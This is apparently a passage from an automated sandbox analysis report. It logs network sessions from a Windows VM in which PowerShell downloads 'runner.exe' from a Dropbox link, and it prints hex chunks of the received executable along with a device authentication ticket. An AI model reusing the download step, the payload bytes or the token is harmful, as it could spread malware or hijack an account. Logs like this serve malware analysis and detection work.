                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 35 46 62 64 76 42 75 55 30 6d 31 34 43 4f 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 37 32 61 61 37 64 31 65 30 39 64 39 36 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 75 34 2b 72 62 65 4f 36 32 67 56 41 64 43 47 6d 4a 57 6e 32 69 55 56 77 74 78 48 46 79 55 54 6b 58 59 76 67 47 4c 2f 66 68 44 4b 69 76 79 64 54 36 50 31 57 6b 73 33 64 53 47 69 69 66 46 63 2b 6e 7a 67 65 4a 64 36 7a 43 6d 2f 53 30 69 73 51 65 52 2b 6e 5a 36 70 55 75 76 2b 4e 61 37 78 63 38 6f 41 54 6d 31 39 70 61 50 6f 34
                                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: I5FbdvBuU0m14COf.2Context: 9572aa7d1e09d966<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWu4+rbeO62gVAdCGmJWn2iUVwtxHFyUTkXYvgGL/fhDKivydT6P1Wks3dSGiifFc+nzgeJd6zCm/S0isQeR+nZ6pUuv+Na7xc8oATm19paPo4
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 35 46 62 64 76 42 75 55 30 6d 31 34 43 4f 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 37 32 61 61 37 64 31 65 30 39 64 39 36 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: I5FbdvBuU0m14COf.3Context: 9572aa7d1e09d966<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 74 76 53 34 71 5a 50 4b 6b 4b 35 79 55 33 77 30 6a 35 6c 48 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: ttvS4qZPKkK5yU3w0j5lHg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        18192.168.2.649817162.125.65.184436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:37 UTC212OUTGET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: www.dropbox.com
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:38 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www. [TRUNCATED]
                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                        Location: https://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com/cd/0/get/CgCEuRRMHdo1n8xDRYr3hdPQBokKmoupLM-SXQcxSZ-cWl3EecnBrskW3hNzDSS0t9teYsZslX3TL5iGhn0tnO_sLx5OmgiL7UPtp0drEJqD-1-Vx-gBZNlKPuQZL5ahvAUhpgetrCGvOX5CAg0RxXY9/file?dl=1#
                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                        Set-Cookie: gvc=MjE1NDI4OTk1MDU3OTk4NTE5NDkxMzc0NDQ3NDk3MTkwNTkwMDAy; Path=/; Expires=Sun, 09 Dec 2029 17:40:37 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: t=V3OYRjHOogNMfj-v5_QKByAk; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:37 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-js_csrf=V3OYRjHOogNMfj-v5_QKByAk; Path=/; Expires=Wed, 10 Dec 2025 17:40:37 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                        Set-Cookie: __Host-ss=LOBI0ZPL-Q; Path=/; Expires=Wed, 10 Dec 2025 17:40:37 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                        Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:37 GMT
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                        Content-Length: 17
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:38 GMT
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 2e84841405554c028c032ffb72af08c9
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:38 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        19192.168.2.649831162.125.69.154436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:40 UTC370OUTGET /cd/0/get/CgCEuRRMHdo1n8xDRYr3hdPQBokKmoupLM-SXQcxSZ-cWl3EecnBrskW3hNzDSS0t9teYsZslX3TL5iGhn0tnO_sLx5OmgiL7UPtp0drEJqD-1-Vx-gBZNlKPuQZL5ahvAUhpgetrCGvOX5CAg0RxXY9/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        Etag: 1733720950943161d
                                                                                                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Server-Response-Time: 285
                                                                                                                                                                                                                                                                                                                        X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:40 GMT
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                        Content-Length: 2764800
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: a7eb2e3337714bd1857e7eece7e138fa
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zz#Rich
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: 89 4c 24 10 db 44 24 10 7d 06 dc 05 58 d6 53 00 dc 0d a8 d6 53 00 dd 5f 20 8b 4e 04 8b 06 03 c1 83 c1 04 89 4e 04 0f b6 50 01 33 c9 8a 68 03 8a 48 02 0f b6 00 c1 e1 08 0b ca c1 e1 08 0b c8 89 4c 24 10 db 44 24 10 dc 0d a8 d6 53 00 dd 5f 30 8b 4e 04 8b 06 03 c1 83 c1 04 89 4e 04 0f b6 50 01 33 c9 8a 68 03 8a 48 02 0f b6 00 c1 e1 08 0b ca c1 e1 08 0b c8 89 4c 24 10 db 44 24 10 dc 0d a8 d6 53 00 dd 5f 38 8b 4e 04 8b 06 03 c1 83 c1 02 89 4e 04 33 c9 8a 68 01 8a 08 89 4f 2c 8b ce e8 0d 07 08 00 8b ce e8 96 08 08 00 85 c0 0f 95 c2 8b ce 88 57 40 e8 87 08 08 00 85 c0 0f 95 c0 8b ce 88 47 41 e8 78 08 08 00 85 c0 0f 95 c1 88 4f 42 6a 05 8b ce 88 5f 43 88 5f 44 e8 11 07 08 00 8b ce 89 47 28 e8 d7 06 08 00 8b c7 5f 5e 5d 5b 59 c2 04 00 cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                        Data Ascii: L$D$}XSS_ NNP3hHL$D$S_0NNP3hHL$D$S_8NN3hO,W@GAxOBj_C_DG(_^][Y
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC738INData Raw: 00 3b 44 24 54 0f 8d 7a 00 00 00 8b 44 24 14 8a 48 42 84 c9 74 55 8a 48 41 84 c9 75 4e 8b 0f 8b c1 c1 e8 18 3d ff 00 00 00 75 14 8b c5 c1 e8 18 50 55 51 e8 ba a7 ff ff 83 c4 0c 89 07 eb 4c 50 8b d5 c1 ea 18 52 55 51 e8 15 63 03 00 0d 00 00 00 ff 83 c4 04 50 e8 97 a7 ff ff 83 c4 0c 50 e8 6e 62 03 00 83 c4 08 89 07 eb 20 8b 84 24 08 01 00 00 0f b6 4c 07 03 51 55 e8 54 62 03 00 83 c4 08 89 07 eb 06 c7 07 00 00 00 00 8b 54 24 34 8b 44 24 5c 8b 4c 24 44 42 40 46 83 c7 04 3b c1 89 54 24 34 89 44 24 5c 0f 8c ba fe ff ff eb 0c 8b 4c 24 44 8b 7c 24 3c 33 c0 f3 ab 8b 54 24 48 8b 4c 24 18 8b 44 24 38 42 89 54 24 48 8b 54 24 20 03 ca 89 4c 24 18 8b 4c 24 3c 8d 14 81 8b 44 24 40 8b 4c 24 50 89 54 24 3c 8d 14 88 8b 84 24 dc 00 00 00 48 89 54 24 40 89 84 24 dc 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: ;D$TzD$HBtUHAuN=uPUQLPRUQcPPnb $LQUTbT$4D$\L$DB@F;T$4D$\L$D|$<3T$HL$D$8BT$HT$ L$L$<D$@L$PT$<$HT$@$
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: d6 53 00 eb 15 dc 15 58 d8 53 00 df e0 f6 c4 41 75 08 dd d8 dd 05 58 d8 53 00 dd 5e 18 83 7f 08 03 7e 3e 8b 57 0c 8b 42 0c 8b 0f 53 50 e8 3e d7 ff ff dc 15 d0 d6 53 00 df e0 f6 c4 05 7a 0a dd d8 dd 05 d0 d6 53 00 eb 15 dc 15 58 d8 53 00 df e0 f6 c4 41 75 08 dd d8 dd 05 58 d8 53 00 dd 5e 20 83 7f 08 04 7e 31 8b 4f 0c 8b 51 10 8b 0f 53 52 e8 fa d6 ff ff dc 0d b0 d7 53 00 e8 5f 60 0a 00 3b c3 7d 04 33 c0 eb 0c 3d 00 ff 00 00 7e 05 b8 00 ff 00 00 89 46 2c 83 7f 08 05 7e 23 8b 47 0c 8b 48 14 51 8b 0f e8 24 d7 ff ff 3b c3 7d 04 33 c0 eb 0a 83 f8 0f 7e 05 b8 0f 00 00 00 89 46 28 83 7f 08 06 7e 16 8b 57 0c 8b 42 18 8b 0f 50 e8 eb f0 09 00 85 c0 0f 95 c1 88 4e 40 83 7f 08 07 7e 16 8b 57 0c 8b 42 1c 8b 0f 50 e8 cf f0 09 00 85 c0 0f 95 c1 88 4e 41 5f 8b c6 5e 5b c2
                                                                                                                                                                                                                                                                                                                        Data Ascii: SXSAuXS^~>WBSP>SzSXSAuXS^ ~1OQSRS_`;}3=~F,~#GHQ$;}3~F(~WBPN@~WBPNA_^[
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16102INData Raw: 08 7e 24 8b 55 0c 8b 42 20 8b 4d 00 50 e8 be 97 ff ff 3b c7 7d 04 33 c0 eb 0a 83 f8 0f 7e 05 b8 0f 00 00 00 89 46 28 83 7d 08 09 0f 8e 9f 00 00 00 8b 55 0c 8d 4c 24 10 51 8b 4d 00 83 c2 24 52 89 7c 24 18 89 7c 24 1c 89 7c 24 20 e8 df 95 09 00 8d 44 24 10 50 68 88 d8 53 00 8d 4c 24 24 e8 1c 99 02 00 8b c8 e8 15 8f 02 00 8b 4c 24 1c 51 8a d8 e8 89 dc 02 00 83 c4 04 84 db 74 0a c6 46 40 01 c6 46 44 00 eb 3b 8d 54 24 10 52 68 80 d8 53 00 8d 4c 24 24 e8 e5 98 02 00 8b c8 e8 de 8e 02 00 8a d8 8b 44 24 1c 50 e8 52 dc 02 00 83 c4 04 84 db c6 46 40 00 74 06 c6 46 44 00 eb 04 c6 46 44 01 8b 4c 24 10 51 e8 33 dc 02 00 83 c4 04 83 7d 08 0a 7e 17 8b 55 0c 8b 42 28 8b 4d 00 50 e8 db b0 09 00 85 c0 0f 95 c1 88 4e 41 5f 8b c6 5e 5d 5b 83 c4 18 c2 08 00 cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                        Data Ascii: ~$UB MP;}3~F(}UL$QM$R|$|$|$ D$PhSL$$L$QtF@FD;T$RhSL$$D$PRF@tFDFDL$Q3}~UB(MPNA_^][
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: 8d 03 00 00 8b cb e8 2f 32 05 00 8b 40 54 50 57 e8 15 37 07 00 83 c4 08 85 c0 0f 84 71 03 00 00 8b 74 24 10 50 8b ce c6 46 25 1a e8 2a da 07 00 68 30 d5 40 00 8b ce e8 ce da 07 00 5f 5e 5b 8b e5 5d c3 8b 46 08 85 c0 0f 85 43 03 00 00 57 8b cb e8 64 64 06 00 8b 16 89 44 24 10 db 44 24 10 52 83 ec 08 8d 4e 14 dd 1c 24 e8 2b 2f 05 00 5f 5e 5b 8b e5 5d c3 83 7e 08 03 0f 85 11 03 00 00 8b 46 0c 8b 08 51 8b cf e8 5d 58 ff ff 8b 56 0c 89 44 24 18 8b 42 04 50 8b cf e8 4b 58 ff ff 8b 4e 0c 8b 51 08 48 52 8b cf 89 44 24 18 e8 28 72 09 00 8b 54 24 14 85 c0 0f 95 c0 88 44 24 10 8b 4c 24 10 8b 44 24 18 51 52 50 57 8b cb e8 b8 28 07 00 5f 5e 5b 8b e5 5d c3 83 7e 08 02 0f 85 ae 02 00 00 8b 4e 0c 8b 11 52 8b cf e8 fa 57 ff ff 89 44 24 18 8b 46 0c 8b 48 04 51 8b cf e8 e8
                                                                                                                                                                                                                                                                                                                        Data Ascii: /2@TPW7qt$PF%*h0@_^[]FCWddD$D$RN$+/_^[]~FQ]XVD$BPKXNQHRD$(rT$D$L$D$QRPW(_^[]~NRWD$FHQ
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: 3b f8 0f 84 85 00 00 00 8d 44 24 54 50 e8 c8 30 02 00 83 c4 04 33 f6 8d 49 00 8d 4c 24 20 51 8d 54 24 48 56 52 e8 20 31 02 00 8b 4f 54 83 c4 0c 6a 00 8d 44 24 24 50 51 8b cb e8 bb 56 08 00 8b 44 24 14 8b 48 54 6a 00 8d 54 24 24 52 51 8b cb e8 55 57 08 00 8d 54 24 54 52 8d 44 24 24 50 e8 06 32 02 00 83 c4 08 46 83 fe 04 7c ad 8b 4c 24 54 8b 54 24 58 8b 44 24 5c 89 4c 24 44 8b 4c 24 60 89 54 24 48 89 44 24 4c 89 4c 24 50 8b 45 08 8b 10 8d 70 14 52 8b ce e8 cd f0 04 00 8b 06 8b c8 83 e1 07 80 f9 07 75 06 83 e0 f8 8b 40 04 83 e0 f8 8b f0 74 70 db 44 24 44 83 ec 08 8b ce dc 0d 70 dd 53 00 dd 1c 24 68 bc df 53 00 e8 58 ce 07 00 db 44 24 48 83 ec 08 8b ce dc 0d 70 dd 53 00 dd 1c 24 68 b4 df 53 00 e8 3c ce 07 00 db 44 24 4c 83 ec 08 8b ce dc 0d 70 dd 53 00 dd 1c
                                                                                                                                                                                                                                                                                                                        Data Ascii: ;D$TP03IL$ QT$HVR 1OTjD$$PQVD$HTjT$$RQUWT$TRD$$P2F|L$TT$XD$\L$DL$`T$HD$LL$PEpRu@tpD$DpS$hSXD$HpS$hS<D$LpS
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC282INData Raw: 00 00 00 57 8d bc 24 98 00 00 00 57 8d 7c 24 5c 57 50 8d 44 24 24 50 51 8b cb ff 52 0c 84 c0 74 27 8d 4c 24 68 51 8b 4c 24 30 e8 1b df 02 00 8b 16 8b 4c 24 3c 52 6a 00 e8 8d af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 8b 06 8b 4c 24 3c 50 6a fa e8 74 af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 8b 0e 51 6a fb 8b cd e8 5d af 04 00 5b 5d 5f 5e 81 c4 c4 01 00 00 c3 83 7e 08 03 0f 8c 77 16 00 00 8d 54 24 14 52 8d 44 24 2c 50 8d 7c 24 4c e8 35 83 ff ff 83 c4 08 85 c0 0f 85 3a 07 00 00 8b 46 08 33 ff 83 f8 05 89 7c 24 2c 7c 59 8b 56 0c 83 c2 0c 52 56 e8 af 70 ff ff 83 c4 08 3b c7 89 44 24 2c 74 1c 8b 40 04 3b c7 74 15 39 78 28 7e 10 39 78 24 7e 0b 39 78 1c 74 06 83 78 04 08 74 06 89 7c 24 2c eb 1f 8b 4e 0c 8d 44 24 68 83 c1 10 50 51 8b 0e e8 5f f5 08 00 85 c0 75 08
                                                                                                                                                                                                                                                                                                                        Data Ascii: W$W|$\WPD$$PQRt'L$hQL$0L$<Rj[]_^L$<Pjt[]_^Qj][]_^~wT$RD$,P|$L5:F3|$,|YVRVp;D$,t@;t9x(~9x$~9xtxt|$,ND$hPQ_u
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: e8 bb f1 08 00 89 44 24 10 8b 44 24 28 8b 78 04 33 ed 3b c3 0f 85 bb 00 00 00 8d 4c 24 44 51 8d 54 24 18 52 e8 57 f2 01 00 83 c4 08 85 c0 0f 84 a1 00 00 00 8b 44 24 48 8b 4c 24 1c 3b c1 7f 14 0f 85 8f 00 00 00 8b 44 24 44 3b 44 24 14 0f 8e 81 00 00 00 6a 40 e8 25 33 11 00 83 c4 04 85 c0 74 2b 8b 57 04 8b 4c 24 20 8b 6f 0c 6a 00 6a 04 6a 00 52 2b 4c 24 2c 8b 54 24 28 51 2b 54 24 28 52 55 8b c8 e8 b7 2e 0b 00 8b e8 eb 02 33 ed 33 c0 50 6a 01 50 50 89 84 24 b4 00 00 00 89 84 24 b8 00 00 00 8d 84 24 b4 00 00 00 50 8d 4c 24 28 51 55 57 e8 38 70 02 00 8b 44 24 3c 8b 4c 24 34 8d 54 24 34 52 f7 d8 50 f7 d9 51 8b fd e8 2e ef 01 00 83 c4 2c 8d 54 24 54 52 e8 e1 ee 01 00 8b 44 24 30 83 c4 04 85 c0 74 05 8b 40 04 eb 02 33 c0 8b 54 24 10 85 d2 0f 94 c2 8d 4c 24 54 51
                                                                                                                                                                                                                                                                                                                        Data Ascii: D$D$(x3;L$DQT$RWD$HL$;D$D;D$j@%3t+WL$ ojjjR+L$,T$(Q+T$(RU.33PjPP$$$PL$(QUW8pD$<L$4T$4RPQ.,T$TRD$0t@3T$L$TQ
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:41 UTC16384INData Raw: 3c 20 74 04 3c 3d 75 0d 3b ca 7d 09 8a 46 01 46 41 84 c0 75 eb 8a 06 32 db 84 c0 74 3f 8b ce 2b cf 3b ca 7d 37 3c 31 74 28 6a 04 68 98 dd 53 00 56 e8 fa cf 0a 00 83 c4 0c 85 c0 74 14 6a 03 68 2c e2 53 00 56 e8 e6 cf 0a 00 83 c4 0c 85 c0 75 0b 5f b0 01 5e 0f b6 c0 5b c2 0c 00 5f 5e 0f b6 c3 5b c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8a 08 84 c9 55 8b 6c 24 10 57 8b 7c 24 10 74 1b 8b d0 2b d7 80 f9 20 74 05 80 f9 3d 75 0d 3b d5 7d 09 8a 48 01 40 42 84 c9 75 e9 8a 08 33 d2 84 c9 74 22 56 8b f0 2b f7 8d 64 24 00 80 f9 0d 74 13 80 f9 0a 74 0e 3b f5 7d 0a 8a 4c 02 01 42 46 84 c9 75 e8 5e 80 7c 02 ff 20 5f 5d 75 0a 8a 4c 10 fe 4a 80 f9 20 74 f6 52 50 e8 ed 95 01 00 83 c4 08 c2 0c 00 cc cc cc cc cc cc cc 83 ec 18 53 56 8b 74 24 24 57 68 54 e4 53 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: < t<=u;}FFAu2t?+;}7<1t(jhSVtjh,SVu_^[_^[D$Ul$W|$t+ t=u;}H@Bu3t"V+d$tt;}LBFu^| _]uLJ tRPSVt$$WhTS


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        20192.168.2.64985220.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:48 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 70 50 43 69 75 2f 71 58 38 55 4f 68 65 39 77 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 66 30 63 66 32 64 32 35 66 30 32 62 35 62 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: pPCiu/qX8UOhe9wu.1Context: 4f0cf2d25f02b5b4
